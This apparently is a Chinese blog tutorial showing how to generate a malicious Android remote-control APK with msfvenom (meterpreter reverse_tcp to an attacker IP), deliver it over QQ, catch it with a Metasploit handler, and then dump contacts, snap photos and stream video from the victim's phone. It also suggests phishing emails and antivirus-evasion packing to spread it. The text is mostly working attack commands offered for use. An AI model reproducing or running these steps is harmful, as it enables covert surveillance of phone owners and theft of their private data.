前言

这几天在搞一点儿比较有意思的东西，渗透的工具还能用来做什么，大佬告诉我说，运营商信号降频抓取客户数据信息，从而实现对目标有针对性的远程攻击，奈何没有设备，只能从现有的工具上想想搞一搞，这不，发现了之前没有注意的新功能，，，

准备

kali什么版本无所谓

手机一台或者使用模拟器

这里tips一下，夜神、mumu、雷电用着都不错

生成恶意远控apk

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.137.17 lport=6666 R>/root/桌面/test1.apk

文件传输，这里的话可以发散一下思路，比如说实现通过钓鱼实现远控手机，，，，只能说不建议使用微信传输，因为微信传输的时候默认加后缀无法直接解析，我这里使用的是QQ传输

桌面路径下生成的test1.apk

Android安装，正常情况下是会报毒的，我是使用实体机小米测试的，但是一般情况下不联网的话可以直接安装给权限就ok了，联网需要小米账号授权，但是想办法给恶意apk加壳免杀的话我觉得应该仅需要授权就可以完成。

攻击端构造监听取值hi选哪个

msfconsole 
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.137.17
set lport 6666

成功启动监听，启动恶意apk

连接成功

sysinfo //查看设备信息

dump_contacts //通讯录下载

看到手机通讯录

webcam_snap -i 1 //拍照一张

webcam_stream -V //视频录像

只要tcp连接不断，html中实时画面。

扩展想法

钓鱼邮件钓鱼页面，只要拥有容易过杀软的免杀手段安卓钓鱼的实现也是比较容实现的。